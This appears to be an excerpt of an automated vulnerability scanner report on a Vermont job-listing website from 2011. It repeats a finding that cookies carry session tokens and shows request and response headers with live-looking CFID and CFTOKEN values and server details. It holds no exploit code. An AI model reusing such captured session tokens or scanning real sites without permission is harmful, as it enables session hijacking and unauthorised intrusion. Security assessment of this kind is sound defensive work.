PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada
Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
location: mn_empagreement_dsp.cfm
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/mn_warninfo_dsp.cfm
Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
